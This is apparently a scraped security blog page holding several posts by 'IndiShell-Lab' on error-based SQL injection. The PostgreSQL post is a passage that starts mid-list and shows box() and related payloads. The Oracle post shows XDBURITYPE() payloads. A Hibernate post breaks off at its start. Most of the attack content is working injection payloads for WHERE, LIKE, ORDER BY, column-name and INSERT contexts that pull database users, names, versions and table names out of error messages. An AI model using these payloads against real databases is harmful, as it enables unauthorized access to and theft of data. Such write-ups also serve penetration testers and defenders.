Sans;">circle</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">path</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">point</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">lseg</span></li><li><span style="color: 
#fcff01; font-family: Expletus Sans;">pg_has_role</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">pg_get_viewdef</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">has_database_privilege</span></li><li><span style="color: #fcff01; font-family: Expletus Sans;">has_any_column_privilege</span></li></ol><p></p><p></p><p></p><p>etc.</p><p><span style="color: #ffa400; font-size: x-large;"><u>box()</u></span></p><p>The box keyword is my favorite 😎 so I am gonna pick this one. box(expr) casts its argument to the geometric type box; a string that is not a valid box literal fails the cast and PostgreSQL reports it as invalid input syntax for type box: "...", with the offending value quoted verbatim in the error message. That is what leaks the data. </p><p><span style="background-color: black; color: #fcff01; font-size: large;">Select Statement - Where Clause</span> </p><p>Let's start with the case of a <span style="color: #fcff01;">Where clause</span>, where user-supplied data is passed as a value to the where clause of a <span style="color: #fcff01;">Select </span>statement. For example, below is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 365px;"> SELECT * FROM admins where id=User_Supplied_Data</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7hvZ0WJThSWKd5twxsVi0bdhTS_rUg80PEV-ed0n6vYwtfAEUA34QKs2pi5WBlPGdWtkB87_SQKMybtARnlth5OPvJln-GZSyc6cTVYNcv4ExEstEoYr8axekRYRJOTmSMqFZ76heKo2ket0hxlsib2o9zi6Yv6lrHrn1coTaCjjbJeje2A8sDs77VAo/s1424/1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="528" data-original-width="1424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7hvZ0WJThSWKd5twxsVi0bdhTS_rUg80PEV-ed0n6vYwtfAEUA34QKs2pi5WBlPGdWtkB87_SQKMybtARnlth5OPvJln-GZSyc6cTVYNcv4ExEstEoYr8axekRYRJOTmSMqFZ76heKo2ket0hxlsib2o9zi6Yv6lrHrn1coTaCjjbJeje2A8sDs77VAo/s16000/1.png" /></a></div><br /><p>To exploit this injection point we can use the payloads below to execute a SQL query and force the database to reveal the result in its error message:</p><p>👉 Payload to extract the current SQL server 
username:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 205px;"> and ''=''||box(user)</textarea></pre><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcAVWHdhXosms65hVUxlCm5K98Zsc05sHFe1jntxyGvJcum8Th__hZMNhGGLbXgGlnKtMebvf9eZ0gwFxjCD7HDv8Is6PRD57QhwSofJYXKwojbevfjzFYG9Jp9rIKBlwvqdAFj516kD34f14VZwYEA06Z_GIo0uXWEFCeSYeV-5MZUa38N_UhyNKzNFA/s1711/2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="537" data-original-width="1711" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcAVWHdhXosms65hVUxlCm5K98Zsc05sHFe1jntxyGvJcum8Th__hZMNhGGLbXgGlnKtMebvf9eZ0gwFxjCD7HDv8Is6PRD57QhwSofJYXKwojbevfjzFYG9Jp9rIKBlwvqdAFj516kD34f14VZwYEA06Z_GIo0uXWEFCeSYeV-5MZUa38N_UhyNKzNFA/s16000/2.png" /></a></div><div class="separator" style="clear: both; text-align: left;"><p>👉 Payload to extract the name of current database:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 285px;"> and ''=''||box(current_database())</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7FYVLQ4SF-pOQPQLSe8Z8Ax5mlZ4PKuZj6QH_lVCSp-D7DMTeOQ0nSkDzDOjdJ2WaJqGG8D-1O_erxVpq6Mmw-8QkxGYqQYHV7FQiC0Zp0UdGLOhC2OZHWagUoglOVpuq5INMYebbyt2ppGhYSfY_K6KXxPjtcwnpD5vPtNQlRcwTLUo1SmpfTNw1JcQ/s1754/3.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="588" data-original-width="1754" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7FYVLQ4SF-pOQPQLSe8Z8Ax5mlZ4PKuZj6QH_lVCSp-D7DMTeOQ0nSkDzDOjdJ2WaJqGG8D-1O_erxVpq6Mmw-8QkxGYqQYHV7FQiC0Zp0UdGLOhC2OZHWagUoglOVpuq5INMYebbyt2ppGhYSfY_K6KXxPjtcwnpD5vPtNQlRcwTLUo1SmpfTNw1JcQ/s16000/3.png" /></a></div><br /><span>👉 Payload to extract the name of first table in current database:</span><pre><textarea 
cols="20" rows="2" style="height: 27px; width: 950px;"> and ''=''||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))</textarea></pre><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI3DP0_KbExQzMklEkEXDqh0hzNTLdXvc9_rccoXzbGnLS9uq-f2FC58vG_7uR9SfZr1ZfQ7d3qdIrf9kcKkVqI4TqKtpGpIhw1FUfMdh5CA8U99O1S1Pw6j4Zd1UIgR5YLrjIy0dVf5eCX7GqlZ6RA5rinpG61ssOpq1Q8iM_FQygnUZem-OFqjyIU0c/s1277/4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="517" data-original-width="1277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI3DP0_KbExQzMklEkEXDqh0hzNTLdXvc9_rccoXzbGnLS9uq-f2FC58vG_7uR9SfZr1ZfQ7d3qdIrf9kcKkVqI4TqKtpGpIhw1FUfMdh5CA8U99O1S1Pw6j4Zd1UIgR5YLrjIy0dVf5eCX7GqlZ6RA5rinpG61ssOpq1Q8iM_FQygnUZem-OFqjyIU0c/s16000/4.png" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p><span style="background-color: black;"><span style="color: #fcff01; font-size: large;">Select Statement - Like Clause</span> </span>: </p><p>Lets start with case of <span style="color: #fcff01;">Like clause </span>when user supplied data is getting pass to like clause in a <span style="color: #fcff01;">Select </span>statement. 
For example, below mentioned is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 500px;">SELECT * FROM admins where handle like 'User_Supplied_data%'</textarea></pre><span><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq9yhhGl4dwym0wLODrd7ZxmpZmdF-nHhUpovsiy8dLgrRYeGSECwDoOU4owJxGeYEW2HsKT75pKa7wDMvo-Gi12n8e55G5DLusavnmoce_hXBFR-lRw4dVG5cs5NuwIlRqS3sSWirj0N_2B6Zagvdgiefq67rlggtxaioX43wVkf9IwbM0_i76K6G6c/s1472/like.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzq9yhhGl4dwym0wLODrd7ZxmpZmdF-nHhUpovsiy8dLgrRYeGSECwDoOU4owJxGeYEW2HsKT75pKa7wDMvo-Gi12n8e55G5DLusavnmoce_hXBFR-lRw4dVG5cs5NuwIlRqS3sSWirj0N_2B6Zagvdgiefq67rlggtxaioX43wVkf9IwbM0_i76K6G6c/s16000/like.png" /></a></div><br /></div>How to exploit it? There we go..</span><div><span><br />👉 Payload to extract the current SQL server username:</span><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 27px; width: 250px;">'||box(current_database())--+ </textarea></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6Kz-lNeCuozmYmbq4ysa3Oy2a6FyTKchh2NU8dzoxoNfJEs7hDxcDkJkVFTLQNbKYJjyQVwXqdV8h89ef94Z6roV6p2mlskzzUXvmXlpYx97K7kMC_8vdMc3e29GeIikYRUyuDPwiZGbnWii0KrmDdl-J-dPBVrl6v_bjR5UV547QARaJNXnxuUVpK4/s1452/like11.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="471" data-original-width="1452" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis6Kz-lNeCuozmYmbq4ysa3Oy2a6FyTKchh2NU8dzoxoNfJEs7hDxcDkJkVFTLQNbKYJjyQVwXqdV8h89ef94Z6roV6p2mlskzzUXvmXlpYx97K7kMC_8vdMc3e29GeIikYRUyuDPwiZGbnWii0KrmDdl-J-dPBVrl6v_bjR5UV547QARaJNXnxuUVpK4/s16000/like11.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract the name of first table in current database:</span><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 34px; width: 900px;">'||box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0))--+</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQPHCfadl6k2IUp7TkEuOE1QnNyqcTg75KUHy_PxrpAv7G2piEI_RTzk4LXvdDFjmkE1IHIilfECoFZGKQVvceTvmZkOxVyKzBh9mnw0G-ivwz1fPDAj9iH6qqNvFCgXClsgPN-qLhk8vdMixYfeRRMKKuxMbEwvoZVIPyJaOVFJXqiF8bVBmn3JM5cQ/s1462/like12.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="1462" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhAQPHCfadl6k2IUp7TkEuOE1QnNyqcTg75KUHy_PxrpAv7G2piEI_RTzk4LXvdDFjmkE1IHIilfECoFZGKQVvceTvmZkOxVyKzBh9mnw0G-ivwz1fPDAj9iH6qqNvFCgXClsgPN-qLhk8vdMixYfeRRMKKuxMbEwvoZVIPyJaOVFJXqiF8bVBmn3JM5cQ/s16000/like12.png" /></a></div><br /><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><p><span style="background-color: black;"><span style="color: #fcff01; font-size: large;">Select Statement - Order By Clause</span> </span>: </p><p>Let's 
suppose, we have below mentioned vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 400px;">SELECT * FROM admins order by User_Supplied_Data</textarea></pre></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDfL31tZBB_icDRyJeJNTShG_QK7q7oBW-o7wJz7ViwgK5NdFwznXlhfyLgqoenVpG8EV4YK_WoQMbC3fnBgbWcmbp7cD9pNnOk4Pzz-nS24Kkzh8D4B9w1e7BkWRkSbdi2xDSe_I4Fc71emyi_i4omzXzg_prV3VWFBay0dlgFsAzXUvtZn9DG8nrDuE/s1274/order.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="531" data-original-width="1274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDfL31tZBB_icDRyJeJNTShG_QK7q7oBW-o7wJz7ViwgK5NdFwznXlhfyLgqoenVpG8EV4YK_WoQMbC3fnBgbWcmbp7cD9pNnOk4Pzz-nS24Kkzh8D4B9w1e7BkWRkSbdi2xDSe_I4Fc71emyi_i4omzXzg_prV3VWFBay0dlgFsAzXUvtZn9DG8nrDuE/s16000/order.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract the current SQL server username:</span></div><br /><div class="separator" style="clear: both; text-align: left;"><textarea cols="20" rows="2" style="height: 27px; width: 250px;">(select 1 from box(user))</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQ_BTilG4sCZhGDyYHonztXKnTOyeEUlQlqmmSdrwpAw11nPp0JQvofWNO86TJ5vJavyHU7_2GCkcwzSEhi84tgsYwnpcWDvGbSop3qQEoOY5M-ZkbjIEBEXk5hAt_M6Ga12NVCIyhLEpuWlv_BLwFIeseKdCSMoclN0hLqEOmUfpcygUG9Dv0AicOu8/s1282/order1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="552" data-original-width="1282" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBQ_BTilG4sCZhGDyYHonztXKnTOyeEUlQlqmmSdrwpAw11nPp0JQvofWNO86TJ5vJavyHU7_2GCkcwzSEhi84tgsYwnpcWDvGbSop3qQEoOY5M-ZkbjIEBEXk5hAt_M6Ga12NVCIyhLEpuWlv_BLwFIeseKdCSMoclN0hLqEOmUfpcygUG9Dv0AicOu8/s16000/order1.png" /></a></div><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><span>👉 Payload to extract </span>the name of first table in current database:<div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both;"><textarea cols="20" rows="2" style="height: 27px; width: 950px;">(select 1 from box((select table_name from information_schema.tables where table_catalog=current_database() limit 1 offset 0)))</textarea></div><div class="separator" style="clear: both;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh4tLaPykvSL8Ll-3bRBBaJi_t21FoOrQIbVC1q7SRAIE0u1o93mvRFR7bS_i9KlVXTVsYHsRVW5QzIDxdefHffS8ELL3WY12rVJ5jRgT77AtoS3TZ-Mzwdolv2y4E3QumSZE-IYWFqtTiDaTuRVOc2VNQEBuniiCYJ87s51ubadn9YzHIruA2vJwkaA8/s1431/order2.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="504" data-original-width="1431" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgh4tLaPykvSL8Ll-3bRBBaJi_t21FoOrQIbVC1q7SRAIE0u1o93mvRFR7bS_i9KlVXTVsYHsRVW5QzIDxdefHffS8ELL3WY12rVJ5jRgT77AtoS3TZ-Mzwdolv2y4E3QumSZE-IYWFqtTiDaTuRVOc2VNQEBuniiCYJ87s51ubadn9YzHIruA2vJwkaA8/s16000/order2.png" /></a></div><br /><div class="separator" style="clear: both;"><br /></div></div><div class="separator" style="clear: both; text-align: left;"><p><span style="color: #ffa400; font-size: x-large;"><u>Other Functions usage</u></span></p><p>Similarly, we can use below mentioned PostgreSQL functions as well to exploit error based SQL Injection. 
All we need to do is replace box() with any of the functions mentioned below and change the SQL query or variable inside them (current_database()) to the one we want: </p><p><span style="color: #fcff01;"><b>Different functions to extract the current database:</b></span></p><div class="separator" style="clear: both;"><textarea cols="20" rows="2" style="height: 197px; width: 550px;">row_security_active(concat('~',current_database(),'~'))
pg_has_role(1337,user)
polygon(concat('~',current_database(),'~'))
currval(concat('~',current_database(),'~'))
nextval(concat('~',current_database(),'~'))
setval(concat('~',current_database(),'~'),1337)
path(concat('~',current_database(),'~'))
lseg(concat('~',current_database(),'~'))
point(concat('~',current_database(),'~'))
has_database_privilege(1337,user)
...
...
</textarea></div><span>For now, we are done and I will be back with some new stuff. <br />Thanks for your time. <br /><br />With Love from </span></div><div class="separator" style="clear: both; text-align: left;"><span>❤️ --==[ IndiShell-Lab ]]==-- </span>❤️</div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-81171338824973189952023-12-09T14:18:00.006+05:302023-12-10T22:01:21.386+05:30New payload to exploit Error-based SQL injection - Oracle database<p> <span><br />Pranaam to all </span><span style="background-color: black; color: #bbbbbb; font-family: "Segoe UI", Arial; font-size: 16px;">🙏</span><span><br /><br />I was testing new payload to exploit error-based SQL injection when backend database is Oracle or PostgreSQL (will post about them in next blogpost). </span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s1280/one.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-OS2f-mXfdaYpguMckC9BXz2Etxgn6-LaGzwnRYqd5NWvwb7jC2IpATiZ34y0ik3dkW3VIfGT5MRurL9azWIg89WnR-7n0JQiGxwZjwgpNdrpCdF341rIYrAP3v7Ii6RDNp-zaWuKNHfpLWwBEfjt5nexYekBXPY_FILCqxF0ksLfGDTAwKwIS5cACno/s16000/one.png" /></a></div><p>Yeah, that was me at that moment =)) Let's have a look on it. 
</p><p><br /></p><p><span style="font-size: large;"><span style="color: #fcff01;"><b style="background-color: black;">XDBURITYPE():</b></span> </span></p><p>We can use the <span style="background-color: black;"><span style="color: white;">XDBURITYPE()</span></span> function to exploit error-based SQL injection when the backend is an Oracle database. It is useful when the injection point sits in one of the following scenarios:</p><p><span style="color: #ffa400; font-size: medium;"><u>Select statement:</u></span></p><p>👉 <span style="color: #fcff01; font-size: medium;">Column name</span></p><p>👉 <span style="color: #fcff01; font-size: medium;">Where clause</span></p><p>👉 <span style="color: #fcff01; font-size: medium;">Like clause</span></p><p><u style="color: #ffa400; font-size: large;">Insert Query</u></p><p><span style="color: #fcff01; font-size: large;">Select Statement - Column name</span>: Let's start with the case of the <span style="color: #fcff01;">column name</span>, when user-supplied data is passed as a column name to a <span style="color: #fcff01;">Select</span> statement. 
For example, below mentioned is the vulnerable SQL query:</p><pre><textarea cols="20" rows="2" style="height: 27px; width: 365px;">select User_Supplied_Data from Team_Indishell;</textarea></pre><p>In this situation, we can use below mentioned payload to execute SQL query and force Database to reveal the output in Database error message:</p><p>👉 Payload to extract the database version:</p><textarea cols="60" rows="2" style="height: 27px; width: 665px;">XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getclob() </textarea><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJNzrQpBo3RB5EzYfKlqmCpQEyAtuYRoZ5kXdI15_Ps4wrTMAiMuONKJupeKjmPiIKrpxRPaiMSSelPJ8o7ajvUO4evgX5157r5Dk1z5LpbgIkDI234EcGsJAayej_-MLawj6sw-MrWktM-Sma2Wn5z8wbR3IbNy1Z_2bSxdgaYSJBwcCHulKOWNitAEw/s1488/5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="342" data-original-width="1488" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJNzrQpBo3RB5EzYfKlqmCpQEyAtuYRoZ5kXdI15_Ps4wrTMAiMuONKJupeKjmPiIKrpxRPaiMSSelPJ8o7ajvUO4evgX5157r5Dk1z5LpbgIkDI234EcGsJAayej_-MLawj6sw-MrWktM-Sma2Wn5z8wbR3IbNy1Z_2bSxdgaYSJBwcCHulKOWNitAEw/s16000/5.png" /></a></div><p></p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 965px;"> XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob() </textarea><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK2Bc6Vpt_8J2OPoRzYSvZ0fvigZdFjGPqCL57FYRdYMqPIDBYysg73BvqWJpOUcHcRhp7R-kHO_sDION5pVUToKaTVzSk1oMEF7hwvb3OuDa42013sodczGdvsIj7ZbKkbNExRLuC3Q5vh7N9k8SepQbuHw_PL_N7-DFqy4OradxmJ67ldJHybY4d3g/s1479/4.png" style="margin-left: 1em; margin-right: 
1em;"><img border="0" data-original-height="365" data-original-width="1479" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnK2Bc6Vpt_8J2OPoRzYSvZ0fvigZdFjGPqCL57FYRdYMqPIDBYysg73BvqWJpOUcHcRhp7R-kHO_sDION5pVUToKaTVzSk1oMEF7hwvb3OuDa42013sodczGdvsIj7ZbKkbNExRLuC3Q5vh7N9k8SepQbuHw_PL_N7-DFqy4OradxmJ67ldJHybY4d3g/s16000/4.png" /></a></div><br /><p><span style="color: #fcff01; font-size: large;">Select Statement - Where Clause:</span> now, let's talk about <span style="color: #fcff01;">Where clause </span>, when user supplied data is getting pass to where clause. We have below mentioned vulnerable SQL query:</p><pre><textarea cols="40" rows="2" style="height: 27px; width: 565px;">select * from Team_Indishell where is_admin='User_Supplied_Data'</textarea></pre><p>In this situation, we can use below mentioned payload to execute SQL query and force Database to reveal its output in Database error message:</p><p>👉 Payload to extract the database version:</p><p><textarea cols="60" rows="2" style="height: 27px; width: 665px;">' ||XDBURITYPE((SELECT banner FROM v$version WHERE banner LIKE 'Oracle%')).getblob()--</textarea></p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJSveG4zSoQy6wYtrZwK0LzQ38Ix_ZwQNbc-_nme2KH-_Fs_ZmmmOr48prEwjpUjPrgq3PEGScr9nnZPTwOEFl28mebe4WNsuEKFn7Nbhf_96_Z3PuRZVwaFjOCz4T3V0qZDK7dClKWccHqyVCLNK1zDFsQh-nqkT1259EkvbRDt7qnpu0xy2eu0y4e-Y/s1364/6.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJSveG4zSoQy6wYtrZwK0LzQ38Ix_ZwQNbc-_nme2KH-_Fs_ZmmmOr48prEwjpUjPrgq3PEGScr9nnZPTwOEFl28mebe4WNsuEKFn7Nbhf_96_Z3PuRZVwaFjOCz4T3V0qZDK7dClKWccHqyVCLNK1zDFsQh-nqkT1259EkvbRDt7qnpu0xy2eu0y4e-Y/s16000/6.png" /></a></div><br /><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 
965px;"> '||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()-- </textarea><div class="separator" style="clear: both; text-align: center;"><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52llobmAMzURmCuV6rfIhRsDDmjHkZ61W7HEdIyoGR4TA-o-RjqyV24vdjr6TDWuZTqQjkgpcPCITyLQf_myFbTgxmmmGfgEgCXlJIB5Etd8i66MJJdq9WkaDhdK0oGjG_ciBeJSaYIucaq_IR31f8AM0NxcJ7q_6cEJIACuJOP49QEIGXEjJaeNg4II/s1700/7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="1700" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52llobmAMzURmCuV6rfIhRsDDmjHkZ61W7HEdIyoGR4TA-o-RjqyV24vdjr6TDWuZTqQjkgpcPCITyLQf_myFbTgxmmmGfgEgCXlJIB5Etd8i66MJJdq9WkaDhdK0oGjG_ciBeJSaYIucaq_IR31f8AM0NxcJ7q_6cEJIACuJOP49QEIGXEjJaeNg4II/s16000/7.png" /></a></div><br /><p><span style="color: #fcff01; font-size: large;">Select Statement - Like Clause:</span> Let's discuss the case when user supplied data is getting pass to <span style="color: #fcff01;">like clause</span>. 
We have below mentioned vulnerable SQL query:</p><p></p><p></p><p></p><p style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-decoration-thickness: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><textarea cols="60" rows="2" style="height: 27px; width: 665px;">select * from Team_Indishell where is_admin='yes' and handle like 'User_Supplied_Data%'</textarea></p><p>To exploit SQL injection, we need to use payload in below mentioned style:</p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="2" style="height: 27px; width: 965px;"> '||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getclob()-- </textarea><div><span style="font-family: monospace;"><span style="font-size: 13.3333px; white-space-collapse: preserve;"><br /></span></span></div><div><span style="font-family: monospace;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgApfUVhe6rVWCmAkMk3h4SL9Dzrh-WigeQvL4sCj9T8Jv4QdBfx-IOQyFffqLGx91AL5m3cxCOEoeQUxKPqSkvAC-rNQNffUhjFsuK27oPyCwT2473VGcLPwN_ZxZnn3vseci0KlVqgt-MVIq_r59T69FkakjsCto33jxF32wzlT13GsNJ-GxPGM-GUws/s1728/8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="1728" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgApfUVhe6rVWCmAkMk3h4SL9Dzrh-WigeQvL4sCj9T8Jv4QdBfx-IOQyFffqLGx91AL5m3cxCOEoeQUxKPqSkvAC-rNQNffUhjFsuK27oPyCwT2473VGcLPwN_ZxZnn3vseci0KlVqgt-MVIq_r59T69FkakjsCto33jxF32wzlT13GsNJ-GxPGM-GUws/s16000/8.png" /></a></div><br /><span style="font-size: 13.3333px; white-space-collapse: 
preserve;"><br /></span></span><p></p><p></p></div><p><span style="color: #fcff01; font-size: large;">Insert Query:</span> Let's suppose we have below mentioned vulnerable SQL Insert query:</p><p></p><p></p><p></p><p style="-webkit-text-stroke-width: 0px;"><textarea cols="60" rows="2" style="height: 27px; width: 665px;">insert into Team_Indishell (id,handle,is_admin) values(5,'User_Supplied_Data','yes');</textarea></p><p>To exploit SQL injection, we need to use payload in below mentioned style:</p><p>👉 Payload to extract the first table name:</p><textarea cols="120" rows="4" style="height: 37px; width: 955px;">insert into Team_Indishell (id,handle,is_admin) values(5,''||XDBURITYPE((SELECT table_name FROM (SELECT ROWNUM r,table_name FROM all_tables ORDER BY table_name) WHERE r=1)).getblob()||'','yes');</textarea><div><span style="font-family: monospace;"><span style="font-size: 13.3333px; white-space-collapse: preserve;"><br /></span></span></div><div><span style="font-family: monospace;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3rwoNdjWjcEbaFtkkYgFguSiUHr_eBwdn8RSEZB7HzExIdhlG1JD1zHM9vkJCf4oSx41GPA3eBoHG6OPP9NrKVfKFCQBWa6ea1NzqkShPaYqYzfCTnOW1sg7yKXB2mGCw2R2IaXubaliZK2FnNCkoGQqijsVP2B2VRr6fUst2beOUyB9EcbwhU-MtmI/s1563/9.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="473" data-original-width="1563" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy3rwoNdjWjcEbaFtkkYgFguSiUHr_eBwdn8RSEZB7HzExIdhlG1JD1zHM9vkJCf4oSx41GPA3eBoHG6OPP9NrKVfKFCQBWa6ea1NzqkShPaYqYzfCTnOW1sg7yKXB2mGCw2R2IaXubaliZK2FnNCkoGQqijsVP2B2VRr6fUst2beOUyB9EcbwhU-MtmI/s16000/9.png" /></a></div><br /><div class="separator" style="clear: both; text-align: left;"><span style="font-family: "Times New Roman";">Thank you for your time. 
</span><span style="font-family: "Times New Roman";">We have reached to end of the blog post 😎</span> </div></span><p>./init 0</p><p>--==[[ Team Indishell ]]==--</p></div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-55653405114704641852023-03-30T00:52:00.004+05:302023-11-22T11:25:19.397+05:30Exploiting Hibernate Injection in "Order by" Clause (Oracle database)<p>Pranaam to all 🙏<br /></p><span><a name='more'></a></span><p>In this blog post, I will be discussing case of <span style="color: #f1c232;">Hibernate Query Injection</span></p><p>In this case, the web application was passing user-supplied data as column name to "Order by" clause.</p><p>The below mentioned error message indicated that this was the case of Hibernate Injection:<br /> <br />
